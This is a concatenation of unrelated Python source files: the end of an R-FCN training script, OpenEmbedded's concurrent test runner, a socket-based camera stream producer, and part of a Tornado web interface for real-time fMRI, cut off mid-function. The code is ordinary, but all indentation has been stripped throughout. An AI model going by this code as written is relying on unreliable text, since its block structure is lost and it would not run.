init_model=str(rfcn_stage2_out['model_path']),
solver=solvers[4],
max_iters=max_iters[4],
cfg=cfg,
output_cache='stage3_rpn_final.caffemodel')
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage3_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 3 RPN, generate test proposals only'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_test_name,
rpn_model_path=str(rpn_stage3_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage3_out['test_proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print 'Final model: {}'.format(str(rfcn_stage2_out['model_path']))
print 'Final RPN: {}'.format(str(rpn_stage3_out['test_proposal_path']))
|
concurrencytest.py
|
#!/usr/bin/env python3
#
# Modified for use in OE by Richard Purdie, 2018
#
# Modified by: Corey Goldberg, 2013
# License: GPLv2+
#
# Original code from:
# Bazaar (bzrlib.tests.__init__.py, v2.6, copied Jun 01 2013)
# Copyright (C) 2005-2011 Canonical Ltd
# License: GPLv2+
import os
import sys
import traceback
import unittest
import subprocess
import testtools
import threading
import time
import io
from queue import Queue
from itertools import cycle
from subunit import ProtocolTestCase, TestProtocolClient
from subunit.test_results import AutoTimingTestResultDecorator
from testtools import ThreadsafeForwardingResult, iterate_tests
import bb.utils
import oe.path
__all__ = [
'ConcurrentTestSuite',
'fork_for_tests',
'partition_tests',
]
#
# Patch the version from testtools to allow access to _test_start and allow
# computation of timing information and threading progress
#
class BBThreadsafeForwardingResult(ThreadsafeForwardingResult):
def __init__(self, target, semaphore, threadnum, totalinprocess, totaltests):
super(BBThreadsafeForwardingResult, self).__init__(target, semaphore)
self.threadnum = threadnum
self.totalinprocess = totalinprocess
self.totaltests = totaltests
def _add_result_with_semaphore(self, method, test, *args, **kwargs):
self.semaphore.acquire()
try:
self.result.starttime[test.id()] = self._test_start.timestamp()
self.result.threadprogress[self.threadnum].append(test.id())
totalprogress = sum(len(x) for x in self.result.threadprogress.values())
self.result.progressinfo[test.id()] = "%s: %s/%s %s/%s (%ss) (%s)" % (
self.threadnum,
len(self.result.threadprogress[self.threadnum]),
self.totalinprocess,
totalprogress,
self.totaltests,
"{0:.2f}".format(time.time()-self._test_start.timestamp()),
test.id())
finally:
self.semaphore.release()
super(BBThreadsafeForwardingResult, self)._add_result_with_semaphore(method, test, *args, **kwargs)
#
# A dummy structure to add to io.StringIO so that the .buffer object
# is available and accepts writes. This allows unittest with buffer=True
# to interact ok with subunit which wants to access sys.stdout.buffer.
#
class dummybuf(object):
def __init__(self, parent):
self.p = parent
def write(self, data):
self.p.write(data.decode("utf-8"))
#
# Taken from testtools.ConcurrentTestSuite but modified for OE use
#
class ConcurrentTestSuite(unittest.TestSuite):
def __init__(self, suite, processes):
super(ConcurrentTestSuite, self).__init__([suite])
self.processes = processes
def run(self, result):
tests, totaltests = fork_for_tests(self.processes, self)
try:
threads = {}
queue = Queue()
semaphore = threading.Semaphore(1)
result.threadprogress = {}
for i, (test, testnum) in enumerate(tests):
result.threadprogress[i] = []
process_result = BBThreadsafeForwardingResult(result, semaphore, i, testnum, totaltests)
# Force buffering of stdout/stderr so the console doesn't get corrupted by test output
# as per default in parent code
process_result.buffer = True
# We have to add a buffer object to stdout to keep subunit happy
process_result._stderr_buffer = io.StringIO()
process_result._stderr_buffer.buffer = dummybuf(process_result._stderr_buffer)
process_result._stdout_buffer = io.StringIO()
process_result._stdout_buffer.buffer = dummybuf(process_result._stdout_buffer)
reader_thread = threading.Thread(
target=self._run_test, args=(test, process_result, queue))
threads[test] = reader_thread, process_result
reader_thread.start()
while threads:
finished_test = queue.get()
threads[finished_test][0].join()
del threads[finished_test]
except:
for thread, process_result in threads.values():
process_result.stop()
raise
finally:
for test in tests:
test[0]._stream.close()
def _run_test(self, test, process_result, queue):
try:
try:
test.run(process_result)
except Exception:
# The run logic itself failed
case = testtools.ErrorHolder(
"broken-runner",
error=sys.exc_info())
case.run(process_result)
finally:
queue.put(test)
def removebuilddir(d):
delay = 5
while delay and os.path.exists(d + "/bitbake.lock"):
time.sleep(1)
delay = delay - 1
bb.utils.prunedir(d)
def fork_for_tests(concurrency_num, suite):
result = []
test_blocks = partition_tests(suite, concurrency_num)
# Clear the tests from the original suite so it doesn't keep them alive
suite._tests[:] = []
totaltests = sum(len(x) for x in test_blocks)
for process_tests in test_blocks:
numtests = len(process_tests)
process_suite = unittest.TestSuite(process_tests)
# Also clear each split list so the new suite holds the only reference
process_tests[:] = []
c2pread, c2pwrite = os.pipe()
# Clear buffers before fork to avoid duplicate output
sys.stdout.flush()
sys.stderr.flush()
pid = os.fork()
if pid == 0:
ourpid = os.getpid()
try:
newbuilddir = None
stream = os.fdopen(c2pwrite, 'wb', 1)
os.close(c2pread)
# Create a new separate BUILDDIR for each group of tests
if 'BUILDDIR' in os.environ:
builddir = os.environ['BUILDDIR']
newbuilddir = builddir + "-st-" + str(ourpid)
selftestdir = os.path.abspath(builddir + "/../meta-selftest")
newselftestdir = newbuilddir + "/meta-selftest"
bb.utils.mkdirhier(newbuilddir)
oe.path.copytree(builddir + "/conf", newbuilddir + "/conf")
oe.path.copytree(builddir + "/cache", newbuilddir + "/cache")
oe.path.copytree(selftestdir, newselftestdir)
for e in os.environ:
if builddir in os.environ[e]:
os.environ[e] = os.environ[e].replace(builddir, newbuilddir)
subprocess.check_output("git init; git add *; git commit -a -m 'initial'", cwd=newselftestdir, shell=True)
# Tried to use bitbake-layers add/remove but it requires recipe parsing and hence is too slow
subprocess.check_output("sed %s/conf/bblayers.conf -i -e 's#%s#%s#g'" % (newbuilddir, selftestdir, newselftestdir), cwd=newbuilddir, shell=True)
os.chdir(newbuilddir)
for t in process_suite:
if not hasattr(t, "tc"):
continue
cp = t.tc.config_paths
for p in cp:
if selftestdir in cp[p] and newselftestdir not in cp[p]:
cp[p] = cp[p].replace(selftestdir, newselftestdir)
if builddir in cp[p] and newbuilddir not in cp[p]:
cp[p] = cp[p].replace(builddir, newbuilddir)
# Leave stderr and stdout open so we can see test noise
# Close stdin so that the child goes away if it decides to
# read from stdin (otherwise it's a roulette to see which
# child actually gets keystrokes for pdb etc).
newsi = os.open(os.devnull, os.O_RDWR)
os.dup2(newsi, sys.stdin.fileno())
subunit_client = TestProtocolClient(stream)
# Force buffering of stdout/stderr so the console doesn't get corrupted by test output
# as per default in parent code
subunit_client.buffer = True
subunit_result = AutoTimingTestResultDecorator(subunit_client)
process_suite.run(subunit_result)
if ourpid != os.getpid():
os._exit(0)
if newbuilddir:
removebuilddir(newbuilddir)
except:
# Don't do anything with process children
if ourpid != os.getpid():
os._exit(1)
# Try and report traceback on stream, but exit with error
# even if stream couldn't be created or something else
# goes wrong. The traceback is formatted to a string and
# written in one go to avoid interleaving lines from
# multiple failing children.
try:
stream.write(traceback.format_exc().encode('utf-8'))
except:
sys.stderr.write(traceback.format_exc())
finally:
if newbuilddir:
removebuilddir(newbuilddir)
stream.flush()
os._exit(1)
stream.flush()
os._exit(0)
else:
os.close(c2pwrite)
stream = os.fdopen(c2pread, 'rb', 1)
test = ProtocolTestCase(stream)
result.append((test, numtests))
return result, totaltests
def partition_tests(suite, count):
# Keep tests from the same class together but allow tests from modules
# to go to different processes to aid parallelisation.
modules = {}
for test in iterate_tests(suite):
m = test.__module__ + "." + test.__class__.__name__
if m not in modules:
modules[m] = []
modules[m].append(test)
# Simply divide the test blocks between the available processes
partitions = [list() for _ in range(count)]
for partition, m in zip(cycle(partitions), modules):
partition.extend(modules[m])
# No point in empty threads so drop them
return [p for p in partitions if p]
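# Usage sketch (illustrative): run a discovered suite across 4 forked
# processes. The result object passed to run() must provide the 'starttime'
# and 'progressinfo' dicts that BBThreadsafeForwardingResult writes into, as
# the oeqa selftest result class does; the discovery path is hypothetical.
#
#     suite = unittest.TestLoader().discover('meta/lib/oeqa/selftest')
#     ConcurrentTestSuite(suite, processes=4).run(oeqa_result)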
|
adaptiveStreamProducer.py
|
import cv2,imutils, socket
import time
import threading
import time
import uuid
import logging, os
from functools import partial
from numpy import double
import requests
import json
import sys
import configparser
####### CONFIG PARAMS
#CONFIGSERVERIP = '127.0.0.1'
#CONFIGSERVERPORT = 9997
#logging.basicConfig(filename='adaptiveStreamserver.log', format='%(asctime)s %(levelname)-8s %(message)s',encoding='utf-8', level=logging.DEBUG, datefmt='%Y-%m-%d %H:%M:%S')
logging.basicConfig(handlers=[logging.FileHandler(filename='adaptiveStreamserver.log', encoding='utf-8', mode='a+')], format='%(asctime)s %(levelname)-8s %(message)s', level=logging.DEBUG, datefmt='%Y-%m-%d %H:%M:%S')
######################
p1y = 5
p1x = 5
p2y = 405
p2x = 405
desiredfps = 10
originalfps = 0
imagebuffer = bytes()
configDict = {}
firstStart = True
######################
##### REMOVE ######
def readCLI(s):
while s != True:
cmd = input("Please enter Command: ")
print("You entered: " + cmd)
if cmd == 'add':
host = input("enter Client HOST (e.g.: 192.168.100.1:1234): ")
client = host.split(':')
if (len(client) != 2):
print("invalid client syntax")
continue
global clients
clients.append(host)
CID = str(client[0])+":"+str(client[1])
print("CID: ", CID)
global configDict
#create default config
configDict[CID+"fps"] = 30
configDict[CID+"p1x"] = 0
configDict[CID+"p1y"] = 0
configDict[CID+"p2x"] = 0
configDict[CID+"p2y"] = 0
#CID = uuid.uuid4()
#logging.debug(CID)
thread = threading.Thread(target=worker, args=(stop,client[0], client[1],CID,))
threads.append(thread)
thread.start()
else:
print("#######################################\n HELP\n Supported Commands: \n add: add new client")
def capture(stopthread, name, camid, headless):
if camid < 0:
vid = cv2.VideoCapture("test2.mp4")
else:
vid = cv2.VideoCapture(camid) # non-negative camid opens the corresponding camera device; negative falls back to the file stream above
#vid.set(cv2.CAP_PROP_FRAME_WIDTH, 4000)
#vid.set(cv2.CAP_PROP_FRAME_HEIGHT, 3000)
fps,st,frames_to_count,cnt = (0,0,20,0)
windowname = 'BUFFERED VIDEO'+name
while True:
while(vid.isOpened()):
#continue
_,frame = vid.read()
#frame = frame[p1y:p2y,p1x:p2x]
#frame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
#print("dtype: ",frame.dtype)
logging.debug(frame.shape)
#cv2.imshow('INPUT_ORIG',frame)
logging.debug(' buffer: '+ str(len(bytes(frame))))
global originalfps
global imagebuffer
bufferlock.acquire()
imagebuffer = frame
bufferlock.release()
#frame = cv2.putText(frame,'FPS: '+str(fps),(10,40),cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,0,255),2)
if headless == False:
cv2.imshow(windowname,frame)
key = cv2.waitKey(1) & 0xFF
#if key == ord('q'):
# server_socket.close()
# break
if cnt == frames_to_count:
try:
fps = round(frames_to_count/(time.time()-st))
if originalfps == 0:
originalfps = fps
st=time.time()
cnt=0
except:
pass
cnt+=1
def worker(s,host_ip,port, cid):
BUFF_SIZE = 65536
port = int(port)
CID = cid #host_ip+":"+str(port)
print("CID in worker: ", CID)
s = socket.socket()
s.connect((host_ip, port))
class writeproc(threading.Thread):
def __init__(self, server, CID):
threading.Thread.__init__(self)
self.server = server
self.CID = CID
def run(self):
recieved = 0
while True:
global configDict
if configDict[self.CID+"terminate"] == True:
raise Exception("Got Termination Request")
if configDict[self.CID+"mode"] == "single" and configDict[self.CID+"stop"] == False:
configDict[self.CID+"stop"] = True
global imagebuffer
global distabcebuffer
if len(imagebuffer) == 0:
time.sleep(0.1)
continue
b = time.time()
x = recieved
message = imagebuffer
if 0 != configDict[self.CID+"p1x"] + configDict[self.CID+"p1y"] + configDict[self.CID+"p2x"] + configDict[self.CID+"p2y"]:
message = message[configDict[self.CID+"p1y"]:configDict[self.CID+"p2y"],configDict[self.CID+"p1x"]:configDict[self.CID+"p2x"]]
messagelen = str("%020d"%len(message))
if message.size > 0:
encoded,buffer = cv2.imencode('.jpg',message,[cv2.IMWRITE_JPEG_QUALITY,80])
lenlen = int(len(buffer))
s = "00000000"
blen = str(len(buffer))
#buf = s[:len(blen)-1]+blen
preamble = bytes(str("AB01")+blen.zfill(10), 'utf-8')
#print("buf: ", int(len(buffer)))
#print(type(buffer))
#print(type(buffer.shape))
#print(type(buffer.ndim))
#print(type(buffer.dtype))
#print(type(preamble))
#print(len(preamble))
self.server.send(preamble+buffer.tobytes())
#time.sleep(200)
key = cv2.waitKey(1) & 0xFF
#time.sleep(0.1)
#self.server.send(bytes((messagelen+message), "utf_8"))
lock.acquire()
recieved += 1
lock.release()
#if message == "BYE!":
# final.set()
# break
a = time.time()
sleep_dur = 1/configDict[self.CID+"fps"]-(a-b)
#print("sleeping ",sleep_dur)
while configDict[self.CID+"stop"] == True:
time.sleep(0.05)
if configDict[self.CID+"terminate"] == True:
raise Exception("Got Termination Request")
sleep_dur = 0 # no need to wait anymore
if sleep_dur < 0:
#print("have to speed up")
continue
#print("duration:",a-b, " add sleeping ",sleep_dur)
time.sleep(sleep_dur)
class readproc(threading.Thread):
def __init__(self, server, CID):
threading.Thread.__init__(self)
self.server = server
self.CID = CID
def run(self):
global recieved
while True:
global configDict
if configDict[self.CID+"terminate"] == True:
raise Exception("Got Termination Request")
recieved = 0
x = recieved
if final.is_set():
break
mlen = int(str(self.server.recv(20), 'utf_8'))
response = str(self.server.recv(mlen), 'utf_8')
lock.acquire()
recieved += 1
lock.release()
logging.info(response)
lElem = response.split(",")
command = lElem[0]
#logging.info("Command: "+ command)
if command == 'init':
# make a random UUID
logging.info("do reinit")
#CID = uuid.uuid4()
if command == 'update':
logging.debug("execute update")
configDict[self.CID+"fps"] = int(lElem[1])
configDict[self.CID+"p1x"] = int(lElem[2])
configDict[self.CID+"p1y"] = int(lElem[3])
configDict[self.CID+"p2x"] = int(lElem[4])
configDict[self.CID+"p2y"] = int(lElem[5])
continue
if command == 'stop':
continue
# print("---------------", recieved)
recieved = 0
for i in range(5):
time.sleep(0.1)
#try:
final = threading.Event()
lock = threading.Lock()
cwrite = writeproc(s,CID)
cread = readproc(s,CID)
cwrite.start()
cread.setDaemon(True)
cread.start()
cwrite.join()
s.close()
#except:
# print("worker terminated!")
def callRegistry(name):
#register ourself
global firstStart
if firstStart == True:
x = requests.post('http://'+CONFIGSERVERIP+':'+str(CONFIGSERVERRESTPORT)+'/addProducer', json={'prodname': name})
print(x.status_code)
firstStart = False
if x.ok != True:
return x.ok
#get consumers
x = requests.post('http://'+CONFIGSERVERIP+':'+str(CONFIGSERVERRESTPORT)+'/getConsumers', json={'prodname': name})
json_data = json.loads(x.text)
print(len(json_data))
type(json_data)
for val in json_data:
print(val)
print((json_data[val]["host"]))
global clients
host = json_data[val]["consname"]
CID = host
if CID not in clients:
print("new consumer ... add")
clients.append(host)
print("CID: ", CID)
global configDict
configDict[CID+"fps"] = json_data[val]["fps"]
configDict[CID+"p1x"] = json_data[val]["p1x"]
configDict[CID+"p1y"] = json_data[val]["p1y"]
configDict[CID+"p2x"] = json_data[val]["p2x"]
configDict[CID+"p2y"] = json_data[val]["p2y"]
configDict[CID+"mode"] = json_data[val]["mode"]
configDict[CID+"stop"] = json_data[val]["stop"]
configDict[CID+"terminate"] = False
if configDict[CID+"mode"] == "single" and configDict[CID+"stop"] == False:
configDict[CID+"stop"] = True
elif configDict[CID+"mode"] != "single":
configDict[CID+"stop"] = False
thread = threading.Thread(target=worker, args=(stop,json_data[val]["host"], json_data[val]["port"],CID,))
#configDict[CID+"tid"] = json_data[val]["stop"]
threads.append(thread)
thread.start()
else:
print("known consumer ... skip")
def configThread(stopMainApp, name):
while True:
try:
logging.debug("start config thread ")
INCONFsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
INCONFsock.connect((CONFIGSERVERIP, CONFIGSERVERPORT))
INCONFsock.send(bytes("Hallo Registry ,"+name+", ", 'utf-8'))
while True:
global clients
command = ''
# TODO check if we still need to do this
if len(clients) > 0:
print("New clients: ",str(len(clients)))
#newClient = clients.pop(0)
command = 'init'
buf = INCONFsock.recv(1024)
logging.debug(">>> Config REQUEST: "+str(buf,'utf-8'))
print(">>> Config REQUEST: "+str(buf,'utf-8'))
s = buf.decode("utf-8")
lElem = s.split(",")
command = lElem[0]
logging.debug("Command: "+ command)
print(lElem)
if command == 'init':
# make a random UUID
print("do init")
if command == 'update':
print("do update")
CID = (lElem[7])
if CID in clients:
if configDict[CID+"terminate"] == True: #remove client from previous iteration
clients.remove(CID)
if CID not in clients:
print("potential NEW consumer!")
callRegistry(name)
else:
print("update existing consumer")
configDict[CID+"fps"] = double(lElem[1])
configDict[CID+"p1x"] = int(lElem[2])
configDict[CID+"p1y"] = int(lElem[3])
configDict[CID+"p2x"] = int(lElem[4])
configDict[CID+"p2y"] = int(lElem[5])
configDict[CID+"mode"] = str(lElem[6])
if configDict[CID+"mode"] == "single":
configDict[CID+"stop"] = True
else:
configDict[CID+"stop"] = False
continue
if command == 'start':
print("do start")
CID = (lElem[1])
configDict[CID+"stop"] = False
continue
if command == 'stop':
print("do stop")
CID = (lElem[1])
configDict[CID+"stop"] = True
continue
if command == 'terminate':
print("do terminate")
CID = (lElem[1])
configDict[CID+"terminate"] = True
continue
if command == 'single':
print("do single picture")
CID = (lElem[7])
if CID not in clients:
print("potential NEW consumer!")
callRegistry(name)
else:
print("update existing consumer")
configDict[CID+"fps"] = double(lElem[1])
configDict[CID+"p1x"] = int(lElem[2])
configDict[CID+"p1y"] = int(lElem[3])
configDict[CID+"p2x"] = int(lElem[4])
configDict[CID+"p2y"] = int(lElem[5])
configDict[CID+"mode"] = int(lElem[6])
if configDict[CID+"mode"] == "single":
configDict[CID+"stop"] = True
else:
configDict[CID+"stop"] = False
continue
except:
print("exception in conf thread")
bufferlock = threading.Lock()
stop = False
stopMainApp = False
threads = []
clients = []
###### Load Config File ######
name = sys.argv[1]
config = configparser.ConfigParser()
config.sections()
config.read(name + '.ini')
print(">>: ",config['PRODUCER']['Camid'])
camid = int(config['PRODUCER']['Camid']) # id to identify camera (-1 ... file stream)
reghost = str(config['PRODUCER']['RHost']) # registry host
regport = int(config['PRODUCER']['RPort']) # registry port
regportrest = int(config['PRODUCER']['RPortRest']) # registry port rest-api
headless = bool(config['PRODUCER'].getboolean('Headless')) #
print(headless)
if 'reghost' not in locals():
print("set default ports for registry")
CONFIGSERVERIP = "127.0.0.1"
CONFIGSERVERPORT = 9997
CONFIGSERVERRESTPORT = 10000
else:
CONFIGSERVERIP = reghost
CONFIGSERVERPORT = regport
CONFIGSERVERRESTPORT = regportrest
callRegistry(name)
# config Thread (client config)
cthread = threading.Thread(target=configThread, args=(stopMainApp,name))
cthread.start()
# CLI Thread (reads args from commandline during runtime)
cthread = threading.Thread(target=readCLI, args=(stopMainApp,))
#cthread.start()
# capture Thread (reads buffer from camera)
cthread = threading.Thread(target=capture, args=(stopMainApp,name, camid, headless))
cthread.start()
|
projectInterface.py
|
import tornado.web
import tornado.websocket
import tornado.httpserver
import tornado.ioloop
import os
import time
import ssl
import json
import queue
import logging
import re
import toml
import shlex
import uuid
import bcrypt
import numbers
import asyncio
import threading
import subprocess
from pathlib import Path
from rtCommon.projectUtils import listFilesReqStruct, getFileReqStruct, decodeMessageData
from rtCommon.projectUtils import defaultPipeName, makeFifo, unpackDataMessage
from rtCommon.structDict import StructDict, recurseCreateStructDict
from rtCommon.certsUtils import getCertPath, getKeyPath
from rtCommon.utils import DebugLevels, writeFile, loadConfigFile
from rtCommon.errors import StateError, RequestError, RTError
certsDir = 'certs'
sslCertFile = 'rtcloud.crt'
sslPrivateKey = 'rtcloud_private.key'
CommonOutputDir = '/rtfmriData/'
maxDaysLoginCookieValid = 0.5
moduleDir = os.path.dirname(os.path.realpath(__file__))
rootDir = os.path.dirname(moduleDir)
# Note: User refers to the clinician running the experiment, so userWindow is the main
# browser window for running the experiment.
class Web():
''' Cloud service web-interface that is the front-end to the data processing. '''
app = None
httpServer = None
httpPort = 8888
# Arrays of WebSocket connections that have been established from client windows
wsBrowserMainConns = [] # type: ignore
wsBiofeedbackConns = [] # type: ignore
wsEventConns = [] # type: ignore
wsDataConn = None # type: ignore # Only one data connection
# Callback functions to invoke when message received from client window connection
browserMainCallback = None
browserBiofeedCallback = None
eventCallback = None
# Main html page to load
webDir = os.path.join(rootDir, 'web/')
confDir = os.path.join(webDir, 'conf/')
htmlDir = os.path.join(webDir, 'html')
webIndexPage = 'index.html'
webLoginPage = 'login.html'
webBiofeedPage = 'biofeedback.html'
dataCallbacks = {}
dataSequenceNum = 0
cbPruneTime = 0
# Synchronizing across threads
callbackLock = threading.Lock()
wsConnLock = threading.Lock()
httpLock = threading.Lock()
ioLoopInst = None
filesremote = False
fmriPyScript = None
initScript = None
finalizeScript = None
configFilename = None
cfg = None
testMode = False
runInfo = StructDict({'threadId': None, 'stopRun': False})
resultVals = [[{'x': 0, 'y': 0}]]
@staticmethod
def start(params, cfg, testMode=False):
if Web.app is not None:
raise RuntimeError("Web Server already running.")
Web.testMode = testMode
# Set default value before checking for param overrides
Web.browserMainCallback = defaultBrowserMainCallback
Web.browserBiofeedCallback = defaultBrowserBiofeedCallback
Web.eventCallback = defaultEventCallback
if params.browserMainCallback:
Web.browserMainCallback = params.browserMainCallback
if params.browserBiofeedCallback:
Web.browserBiofeedCallback = params.browserBiofeedCallback
if params.eventCallback:
Web.eventCallback = params.eventCallback
if params.htmlDir:
Web.htmlDir = params.htmlDir
Web.webDir = os.path.dirname(Web.htmlDir)
if params.port:
Web.httpPort = params.port
Web.fmriPyScript = params.fmriPyScript
Web.initScript = params.initScript
Web.finalizeScript = params.finalizeScript
Web.filesremote = params.filesremote
if type(cfg) is str:
Web.configFilename = cfg
cfg = loadConfigFile(Web.configFilename)
Web.cfg = cfg
if not os.path.exists(Web.confDir):
os.makedirs(Web.confDir)
src_root = os.path.join(Web.webDir, 'src')
css_root = os.path.join(Web.webDir, 'css')
img_root = os.path.join(Web.webDir, 'img')
build_root = os.path.join(Web.webDir, 'build')
cookieSecret = getCookieSecret(certsDir)
settings = {
"cookie_secret": cookieSecret,
"login_url": "/login",
"xsrf_cookies": True,
"websocket_max_message_size": 16*1024*1024,
# "max_message_size": 1024*1024*256,
# "max_buffer_size": 1024*1024*256,
}
Web.app = tornado.web.Application([
(r'/', Web.UserHttp),
(r'/login', Web.LoginHandler),
(r'/logout', Web.LogoutHandler),
(r'/feedback', Web.BiofeedbackHttp), # shows image
(r'/wsUser', Web.UserWebSocket),
(r'/wsSubject', Web.BiofeedbackWebSocket),
(r'/wsData', Web.DataWebSocket),
(r'/wsEvents', Web.EventWebSocket), # gets signal to change image
(r'/src/(.*)', tornado.web.StaticFileHandler, {'path': src_root}),
(r'/css/(.*)', tornado.web.StaticFileHandler, {'path': css_root}),
(r'/img/(.*)', tornado.web.StaticFileHandler, {'path': img_root}),
(r'/build/(.*)', tornado.web.StaticFileHandler, {'path': build_root}),
], **settings)
# start event loop if needed
try:
asyncio.get_event_loop()
except RuntimeError as err:
# RuntimeError thrown if no current event loop
# Start the event loop
asyncio.set_event_loop(asyncio.new_event_loop())
# start thread listening for remote file requests on a default named pipe
commPipes = makeFifo(pipename=defaultPipeName)
fifoThread = threading.Thread(name='defaultPipeThread', target=repeatPipeRequestHandler, args=(commPipes,))
fifoThread.setDaemon(True)
fifoThread.start()
if Web.testMode is True:
print("Listening on: http://localhost:{}".format(Web.httpPort))
ssl_ctx = None
else:
ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_ctx.load_cert_chain(getCertPath(certsDir, sslCertFile),
getKeyPath(certsDir, sslPrivateKey))
print("Listening on: https://localhost:{}".format(Web.httpPort))
Web.httpServer = tornado.httpserver.HTTPServer(Web.app, ssl_options=ssl_ctx)
Web.httpServer.listen(Web.httpPort)
Web.ioLoopInst = tornado.ioloop.IOLoop.current()
Web.ioLoopInst.start()
@staticmethod
def stop():
Web.ioLoopInst.add_callback(Web.ioLoopInst.stop)
Web.app = None
@staticmethod
def close():
# Currently this should never be called
raise StateError("Web close() called")
Web.wsConnLock.acquire()
try:
if Web.wsDataConn is not None:
Web.wsDataConn.close()
Web.wsDataConn = None
for client in Web.wsBrowserMainConns[:]:
client.close()
Web.wsBrowserMainConns = []
for client in Web.wsBiofeedbackConns[:]:
client.close()
Web.wsBiofeedbackConns = []
finally:
Web.wsConnLock.release()
@staticmethod
def dataLog(filename, logStr):
cmd = {'cmd': 'dataLog', 'logLine': logStr, 'filename': filename}
try:
response = Web.sendDataMsgFromThread(cmd, timeout=5)
if response.get('status') != 200:
logging.warning('Web: dataLog: error {}'.format(response.get('error')))
return False
except Exception as err:
logging.warning('Web: dataLog: error {}'.format(err))
return False
return True
@staticmethod
def userLog(logStr):
cmd = {'cmd': 'userLog', 'value': logStr}
Web.sendUserMsgFromThread(json.dumps(cmd))
@staticmethod
def sessionLog(logStr):
cmd = {'cmd': 'sessionLog', 'value': logStr}
Web.sendUserMsgFromThread(json.dumps(cmd))
@staticmethod
def setUserError(errStr):
response = {'cmd': 'error', 'error': errStr}
Web.sendUserMsgFromThread(json.dumps(response))
@staticmethod
def sendUserConfig(config, filename=''):
response = {'cmd': 'config', 'value': config, 'filename': filename}
Web.sendUserMsgFromThread(json.dumps(response))
@staticmethod
def sendUserDataVals(dataPoints):
response = {'cmd': 'dataPoints', 'value': dataPoints}
Web.sendUserMsgFromThread(json.dumps(response))
@staticmethod
def sendDataMsgFromThreadAsync(msg):
if Web.wsDataConn is None:
raise StateError("ProjectInterface: FileServer not connected. Please run the fileServer.")
callId = msg.get('callId')
if not callId:
callbackStruct = StructDict()
callbackStruct.dataConn = Web.wsDataConn
callbackStruct.numResponses = 0
callbackStruct.responses = []
callbackStruct.semaphore = threading.Semaphore(value=0)
callbackStruct.timeStamp = time.time()
callbackStruct.msg = msg.copy()
if 'data' in callbackStruct.msg:
del callbackStruct.msg['data']
Web.callbackLock.acquire()
try:
Web.dataSequenceNum += 1
callId = Web.dataSequenceNum
callbackStruct.callId = callId
msg['callId'] = callId
Web.dataCallbacks[callId] = callbackStruct
finally:
Web.callbackLock.release()
Web.ioLoopInst.add_callback(Web.sendDataMessage, msg)
return callId
@staticmethod
def getDataMsgResponse(callId, timeout=None):
Web.callbackLock.acquire()
try:
callbackStruct = Web.dataCallbacks.get(callId, None)
if callbackStruct is None:
raise StateError('sendDataMsgFromThread: no callbackStruct found for callId {}'.format(callId))
finally:
Web.callbackLock.release()
# wait for semaphore signal indicating a callback for this callId has occurred
signaled = callbackStruct.semaphore.acquire(timeout=timeout)
if signaled is False:
raise TimeoutError("sendDataMessage: Data Request Timed Out({}) {}".
format(timeout, callbackStruct.msg))
Web.callbackLock.acquire()
try:
# Remove from front of list not back to stay in order
# Can test removing from back of list to make sure out-of-order works too
response = callbackStruct.responses.pop(0)
if 'data' in response:
status = response.get('status', -1)
numParts = response.get('numParts', 1)
complete = (callbackStruct.numResponses == numParts and len(callbackStruct.responses) == 0)
if complete or status != 200:
# End the multipart transfer
response['incomplete'] = False
Web.dataCallbacks.pop(callId, None)
else:
response['incomplete'] = True
except IndexError:
raise StateError('sendDataMessage: callbackStruct.response is None for command {}'.
format(callbackStruct.msg))
finally:
Web.callbackLock.release()
response['callId'] = callbackStruct.callId
return response
@staticmethod
def sendDataMsgFromThread(msg, timeout=None):
callId = Web.sendDataMsgFromThreadAsync(msg)
response = Web.getDataMsgResponse(callId, timeout=timeout)
return response
@staticmethod
def sendDataMessage(cmd):
''' This function is called within the ioloop thread by scheduling the call'''
Web.wsConnLock.acquire()
try:
msg = json.dumps(cmd)
Web.wsDataConn.write_message(msg)
except Exception as err:
errStr = 'sendDataMessage error: type {}: {}'.format(type(err), str(err))
raise RTError(errStr)
finally:
Web.wsConnLock.release()
@staticmethod
def dataCallback(client, message):
response = json.loads(message)
if 'cmd' not in response:
raise StateError('dataCallback: cmd field missing from response: {}'.format(response))
if 'status' not in response:
raise StateError('dataCallback: status field missing from response: {}'.format(response))
if 'callId' not in response:
raise StateError('dataCallback: callId field missing from response: {}'.format(response))
status = response.get('status', -1)
callId = response.get('callId', -1)
origCmd = response.get('cmd', 'NoCommand')
logging.log(DebugLevels.L6, "callback {}: {} {}".format(callId, origCmd, status))
# Thread Synchronized Section
Web.callbackLock.acquire()
try:
callbackStruct = Web.dataCallbacks.get(callId, None)
if callbackStruct is None:
logging.error('ProjectInterface: dataCallback callId {} not found, current callId {}'
.format(callId, Web.dataSequenceNum))
return
if callbackStruct.callId != callId:
# This should never happen
raise StateError('callId mismatch {} {}'.format(callbackStruct.callId, callId))
callbackStruct.responses.append(response)
callbackStruct.numResponses += 1
callbackStruct.semaphore.release()
except Exception as err:
logging.error('ProjectInterface: dataCallback error: {}'.format(err))
raise err
finally:
Web.callbackLock.release()
if time.time() > Web.cbPruneTime:
Web.cbPruneTime = time.time() + 60
Web.pruneCallbacks()
@staticmethod
def pruneCallbacks():
numWaitingCallbacks = len(Web.dataCallbacks)
if numWaitingCallbacks == 0:
return
logging.info('Web pruneCallbacks: checking {} callbacks'.format(numWaitingCallbacks))
Web.callbackLock.acquire()
try:
maxSeconds = 300
now = time.time()
for callId in list(Web.dataCallbacks.keys()):  # copy keys; entries are deleted below while iterating
# check how many seconds old each callback is
cb = Web.dataCallbacks[callId]
secondsElapsed = now - cb.timeStamp
if secondsElapsed > maxSeconds:
# older than max threshold so remove
cb.status = 400
cb.error = 'Callback time exceeded max threshold {}s {}s'.format(maxSeconds, secondsElapsed)
cb.responses.append({'cmd': 'unknown', 'status': cb.status, 'error': cb.error})
